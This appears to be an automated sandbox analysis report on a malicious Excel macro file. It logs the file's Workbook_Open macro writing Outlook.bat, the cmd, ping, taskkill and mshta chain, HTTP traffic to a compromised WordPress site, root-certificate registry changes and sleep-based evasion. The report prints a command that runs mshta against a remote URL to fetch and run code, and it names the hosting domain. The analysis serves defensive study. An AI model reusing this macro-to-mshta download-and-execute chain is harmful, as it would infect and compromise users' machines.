Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/arrow_down.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/custom-script.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/chart.min.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-embed.min.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/images/up-arrow.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.22:49180 version: TLS 1.2
Source: C:\Windows\System32\mshta.exeWindows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dllJump to behavior
Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

System Summary

barindex
Source: SecuriteInfo.com.Exploit.Siggen3.17149.8245.xlsOLE, VBA macro line: sFile = Environ("Public") & "\Outlook.bat"
Source: VBA code instrumentationOLE, VBA macro: Module EstaPastaDeTrabalho, Function Workbook_Open, String environ: sFile = Environ("Public") & "\Outlook.bat"Name: Workbook_Open
Source: C:\Windows\System32\mshta.exeCode function: 8_2_031AD1958_2_031AD195
Source: C:\Windows\System32\mshta.exeCode function: 8_2_031AC0B98_2_031AC0B9
Source: C:\Windows\System32\mshta.exeCode function: 8_2_0A185ADC8_2_0A185ADC
Source: C:\Windows\System32\mshta.exeCode function: 8_2_0A1852D68_2_0A1852D6
Source: C:\Windows\System32\mshta.exeCode function: 8_2_031AD1708_2_031AD170
Source: C:\Windows\System32\mshta.exeCode function: 8_2_031A789A8_2_031A789A
Source: C:\Windows\System32\mshta.exeCode function: 8_2_031A4FB18_2_031A4FB1
Source: SecuriteInfo.com.Exploit.Siggen3.17149.8245.xlsOLE, VBA macro line: Private Sub Workbook_Open()
Source: VBA code instrumentationOLE, VBA macro: Module EstaPastaDeTrabalho, Function Workbook_OpenName: Workbook_Open
Source: SecuriteInfo.com.Exploit.Siggen3.17149.8245.xlsOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: SecuriteInfo.com.Exploit.Siggen3.17149.8245.xlsOLE indicator, VBA macros: true
Source: SecuriteInfo.com.Exploit.Siggen3.17149.8245.xlsVirustotal: Detection: 49%
Source: SecuriteInfo.com.Exploit.Siggen3.17149.8245.xlsMetadefender: Detection: 27%
Source: SecuriteInfo.com.Exploit.Siggen3.17149.8245.xlsReversingLabs: Detection: 41%
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X................................z=.......................0.......................=...............&.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>.0........J.... ..J..............&.....2..................J....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............c.a.l.l........./.........................&......$.J............/.................&.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X............... .g.e.t.C.m.d.P.i.d...b.a.t. ...........l.0.....c.a.l.l...........=...............&.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............................i.d...b.................l.0.....c.a.l.l...........=...............&.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ...................J....................................@c.J..... ......`.&.............$1.v..............&.....................................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X................................z=.......................0.......................=...............&.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>.0........J.... ..J..............&.....2..................J....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............s.e.t.........../.........................&......$.J............/.................&.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X............... .P.I.D.=.1. ...........................l.0.....s.e.t.............=...............&.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X.......................................................l.0.....s.e.t.............=...............&.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X.................................A.......................0.......................=...............&.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X............... .w.i.n.d.o.w.M.o.d.e...b.a.t. .-.p.i.d. .1. .-.m.o.d.e. .h.i.d.d.e.n. ...........&.....H.......................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............................o.d.e...................l.0.....m.o.d.e...........=...............&.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ...................J....................................@c.J..... ......`.&.............$1.v..............&.....................................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X................................z=.......................0.......................=...............&.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............c.d............./.........................&......$.J............/.................&.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X............... .C.:.\.U.s.e.r.s.\.P.u.b.l.i.c. .......l.0.....c.d...............=...............&.....".......................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............................s.\.P.u.................l.0.....c.d...............=...............&.............................Jump to behavior
Source: C:\Windows\System32\taskkill.exeConsole Write: ................4...............................d1K.......................!.............d...............e.!.............X.......B.........5.....Jump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 8 127.0.0.1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c start /min taskkill /f /im WINWORD.EXE
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im WINWORD.EXE
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://facextrade.com.br/wp-includes/certificates/4.txt
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 8 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c start /min taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://facextrade.com.br/wp-includes/certificates/4.txtJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;WINWORD.EXE&quot;)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\Public\Outlook.batJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR61ED.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@11/85@5/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit
Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Windows\System32\mshta.exeCode function: 8_2_031A8002 pushad ; retf 000Ah8_2_031A8003
Source: C:\Windows\System32\mshta.exeCode function: 8_2_0A180002 push eax; retf 000Ah8_2_0A180003
Source: C:\Windows\System32\mshta.exeCode function: 8_2_0A187002 pushad ; retf 000Ah8_2_0A187003
Source: C:\Windows\System32\mshta.exeCode function: 8_2_0A1828C4 push 8B4802D2h; ret 8_2_0A1828D4
Source: C:\Windows\System32\mshta.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 8 127.0.0.1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 8 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 280Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1468Thread sleep time: -480000s >= -30000sJump to behavior
